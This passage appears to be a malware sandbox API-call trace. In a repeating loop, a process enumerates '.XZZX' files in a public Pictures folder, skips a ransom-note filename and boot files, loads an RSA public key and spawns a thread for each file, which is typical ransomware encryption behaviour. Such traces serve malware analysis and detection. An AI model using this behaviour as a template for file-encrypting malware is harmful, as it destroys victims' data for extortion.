MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0210.046] lstrcpyW (in: lpString1=0x17be7c, lpString2="0FC22E9A1AA1FD13E54A88961EC7E15B.XZZX" | out: lpString1="0FC22E9A1AA1FD13E54A88961EC7E15B.XZZX") returned="0FC22E9A1AA1FD13E54A88961EC7E15B.XZZX" [0210.046] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0210.046] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf88 [0210.046] Sleep (dwMilliseconds=0x96) [0210.200] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0210.200] lstrcmpW (lpString1="28F3174E3D47A1ACF4B1346741C785F4.XZZX", lpString2="..") returned 1 [0210.200] lstrcmpW (lpString1="28F3174E3D47A1ACF4B1346741C785F4.XZZX", lpString2=".") returned 1 [0210.200] StrStrW (lpFirst="28F3174E3D47A1ACF4B1346741C785F4.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0210.200] StrStrW (lpFirst="28F3174E3D47A1ACF4B1346741C785F4.XZZX", lpSrch="ntldr") returned 0x0 [0210.200] StrStrW (lpFirst="28F3174E3D47A1ACF4B1346741C785F4.XZZX", lpSrch="NTLDR") returned 0x0 [0210.200] StrStrW (lpFirst="28F3174E3D47A1ACF4B1346741C785F4.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0210.200] StrStrW (lpFirst="28F3174E3D47A1ACF4B1346741C785F4.XZZX", lpSrch="ntdetect.com") returned 0x0 [0210.200] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 45 [0210.200] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") [0210.200] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0210.200] lstrcpyW (in: lpString1=0x17be7c, lpString2="28F3174E3D47A1ACF4B1346741C785F4.XZZX" | out: lpString1="28F3174E3D47A1ACF4B1346741C785F4.XZZX") returned="28F3174E3D47A1ACF4B1346741C785F4.XZZX" [0210.200] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0210.200] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf8c [0210.201] Sleep (dwMilliseconds=0x96) [0210.395] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0210.395] lstrcmpW (lpString1="2980FDFD3D56218AE4F6E07941E605D2.XZZX", lpString2="..") returned 1 [0210.395] lstrcmpW (lpString1="2980FDFD3D56218AE4F6E07941E605D2.XZZX", lpString2=".") returned 1 [0210.395] StrStrW (lpFirst="2980FDFD3D56218AE4F6E07941E605D2.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0210.396] StrStrW (lpFirst="2980FDFD3D56218AE4F6E07941E605D2.XZZX", lpSrch="ntldr") returned 0x0 [0210.396] StrStrW (lpFirst="2980FDFD3D56218AE4F6E07941E605D2.XZZX", lpSrch="NTLDR") returned 0x0 [0210.396] StrStrW (lpFirst="2980FDFD3D56218AE4F6E07941E605D2.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0210.396] StrStrW (lpFirst="2980FDFD3D56218AE4F6E07941E605D2.XZZX", lpSrch="ntdetect.com") returned 0x0 [0210.396] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 45 [0210.396] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") [0210.396] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0210.396] lstrcpyW (in: lpString1=0x17be7c, lpString2="2980FDFD3D56218AE4F6E07941E605D2.XZZX" | out: lpString1="2980FDFD3D56218AE4F6E07941E605D2.XZZX") returned="2980FDFD3D56218AE4F6E07941E605D2.XZZX" [0210.396] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0210.396] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf90 [0210.396] Sleep (dwMilliseconds=0x96) [0210.549] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0210.549] lstrcmpW (lpString1="4BF5528040685AF08EE9FD2844DA3F38.XZZX", lpString2="..") returned 1 [0210.549] lstrcmpW (lpString1="4BF5528040685AF08EE9FD2844DA3F38.XZZX", lpString2=".") returned 1 [0210.549] StrStrW (lpFirst="4BF5528040685AF08EE9FD2844DA3F38.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0210.549] StrStrW (lpFirst="4BF5528040685AF08EE9FD2844DA3F38.XZZX", lpSrch="ntldr") returned 0x0 [0210.549] StrStrW (lpFirst="4BF5528040685AF08EE9FD2844DA3F38.XZZX", lpSrch="NTLDR") returned 0x0 [0210.549] StrStrW (lpFirst="4BF5528040685AF08EE9FD2844DA3F38.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0210.549] StrStrW (lpFirst="4BF5528040685AF08EE9FD2844DA3F38.XZZX", lpSrch="ntdetect.com") returned 0x0 [0210.549] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 45 [0210.549] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") [0210.549] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0210.549] lstrcpyW (in: lpString1=0x17be7c, lpString2="4BF5528040685AF08EE9FD2844DA3F38.XZZX" | out: lpString1="4BF5528040685AF08EE9FD2844DA3F38.XZZX") returned="4BF5528040685AF08EE9FD2844DA3F38.XZZX" [0210.549] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0210.549] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf94 [0210.550] Sleep (dwMilliseconds=0x96) [0210.699] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0210.699] lstrcmpW (lpString1="847D57104B178490F8F2D4B74FA568D8.XZZX", lpString2="..") returned 1 [0210.699] lstrcmpW (lpString1="847D57104B178490F8F2D4B74FA568D8.XZZX", lpString2=".") returned 1 [0210.699] StrStrW (lpFirst="847D57104B178490F8F2D4B74FA568D8.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0210.699] StrStrW (lpFirst="847D57104B178490F8F2D4B74FA568D8.XZZX", lpSrch="ntldr") returned 0x0 [0210.699] StrStrW (lpFirst="847D57104B178490F8F2D4B74FA568D8.XZZX", lpSrch="NTLDR") returned 0x0 [0210.699] StrStrW (lpFirst="847D57104B178490F8F2D4B74FA568D8.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0210.699] StrStrW (lpFirst="847D57104B178490F8F2D4B74FA568D8.XZZX", lpSrch="ntdetect.com") returned 0x0 [0210.699] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 45 [0210.699] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") [0210.699] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0210.699] lstrcpyW (in: lpString1=0x17be7c, lpString2="847D57104B178490F8F2D4B74FA568D8.XZZX" | out: lpString1="847D57104B178490F8F2D4B74FA568D8.XZZX") returned="847D57104B178490F8F2D4B74FA568D8.XZZX" [0210.699] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0210.699] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf98 [0210.700] Sleep (dwMilliseconds=0x96) [0210.855] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0210.855] lstrcmpW (lpString1="A59ACD7B3AF5E74B902550773F95CB93.XZZX", lpString2="..") returned 1 [0210.855] lstrcmpW (lpString1="A59ACD7B3AF5E74B902550773F95CB93.XZZX", lpString2=".") returned 1 [0210.855] StrStrW (lpFirst="A59ACD7B3AF5E74B902550773F95CB93.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0210.855] StrStrW (lpFirst="A59ACD7B3AF5E74B902550773F95CB93.XZZX", lpSrch="ntldr") returned 0x0 [0210.855] StrStrW (lpFirst="A59ACD7B3AF5E74B902550773F95CB93.XZZX", lpSrch="NTLDR") returned 0x0 [0210.855] StrStrW (lpFirst="A59ACD7B3AF5E74B902550773F95CB93.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0210.855] StrStrW (lpFirst="A59ACD7B3AF5E74B902550773F95CB93.XZZX", lpSrch="ntdetect.com") returned 0x0 [0210.855] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 45 [0210.855] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") [0210.855] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0210.855] lstrcpyW (in: lpString1=0x17be7c, lpString2="A59ACD7B3AF5E74B902550773F95CB93.XZZX" | out: lpString1="A59ACD7B3AF5E74B902550773F95CB93.XZZX") returned="A59ACD7B3AF5E74B902550773F95CB93.XZZX" [0210.855] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0210.855] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf9c [0210.856] Sleep (dwMilliseconds=0x96) [0211.019] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0211.019] lstrcmpW (lpString1="CDC4AAAD0836755B78D170410CA859A3.XZZX", lpString2="..") returned 1 [0211.019] lstrcmpW (lpString1="CDC4AAAD0836755B78D170410CA859A3.XZZX", lpString2=".") returned 1 [0211.019] StrStrW (lpFirst="CDC4AAAD0836755B78D170410CA859A3.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0211.019] StrStrW (lpFirst="CDC4AAAD0836755B78D170410CA859A3.XZZX", lpSrch="ntldr") returned 0x0 [0211.019] StrStrW (lpFirst="CDC4AAAD0836755B78D170410CA859A3.XZZX", lpSrch="NTLDR") returned 0x0 [0211.019] StrStrW (lpFirst="CDC4AAAD0836755B78D170410CA859A3.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0211.020] StrStrW (lpFirst="CDC4AAAD0836755B78D170410CA859A3.XZZX", lpSrch="ntdetect.com") returned 0x0 [0211.020] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 45 [0211.020] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") [0211.020] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0211.020] lstrcpyW (in: lpString1=0x17be7c, lpString2="CDC4AAAD0836755B78D170410CA859A3.XZZX" | out: lpString1="CDC4AAAD0836755B78D170410CA859A3.XZZX") returned="CDC4AAAD0836755B78D170410CA859A3.XZZX" [0211.020] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0211.020] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfa0 [0211.020] Sleep (dwMilliseconds=0x96) [0211.167] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0211.167] lstrcmpW (lpString1="D1FD6140114402301247CBC41572E678.XZZX", lpString2="..") returned 1 [0211.167] lstrcmpW (lpString1="D1FD6140114402301247CBC41572E678.XZZX", lpString2=".") returned 1 [0211.167] StrStrW (lpFirst="D1FD6140114402301247CBC41572E678.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0211.167] StrStrW (lpFirst="D1FD6140114402301247CBC41572E678.XZZX", lpSrch="ntldr") returned 0x0 [0211.167] StrStrW (lpFirst="D1FD6140114402301247CBC41572E678.XZZX", lpSrch="NTLDR") returned 0x0 [0211.167] StrStrW (lpFirst="D1FD6140114402301247CBC41572E678.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0211.167] StrStrW (lpFirst="D1FD6140114402301247CBC41572E678.XZZX", lpSrch="ntdetect.com") returned 0x0 [0211.167] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 45 [0211.167] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") [0211.167] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0211.167] lstrcpyW (in: lpString1=0x17be7c, lpString2="D1FD6140114402301247CBC41572E678.XZZX" | out: lpString1="D1FD6140114402301247CBC41572E678.XZZX") returned="D1FD6140114402301247CBC41572E678.XZZX" [0211.167] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0211.167] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfa4 [0211.168] Sleep (dwMilliseconds=0x96) [0211.323] FindNextFileW (in: hFindFile=0x43728b8, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0211.323] lstrcmpW (lpString1="FA4BF7A60F1F0C98B1C0F8BE134DF0E0.XZZX", lpString2="..") returned 1 [0211.323] lstrcmpW (lpString1="FA4BF7A60F1F0C98B1C0F8BE134DF0E0.XZZX", lpString2=".") returned 1 [0211.323] StrStrW (lpFirst="FA4BF7A60F1F0C98B1C0F8BE134DF0E0.XZZX", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0211.323] StrStrW (lpFirst="FA4BF7A60F1F0C98B1C0F8BE134DF0E0.XZZX", lpSrch="ntldr") returned 0x0 [0211.323] StrStrW (lpFirst="FA4BF7A60F1F0C98B1C0F8BE134DF0E0.XZZX", lpSrch="NTLDR") returned 0x0 [0211.323] StrStrW (lpFirst="FA4BF7A60F1F0C98B1C0F8BE134DF0E0.XZZX", lpSrch="NTDETECT.COM") returned 0x0 [0211.323] StrStrW (lpFirst="FA4BF7A60F1F0C98B1C0F8BE134DF0E0.XZZX", lpSrch="ntdetect.com") returned 0x0 [0211.323] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned 45 [0211.323] OutputDebugStringW (lpOutputString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") [0211.323] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- 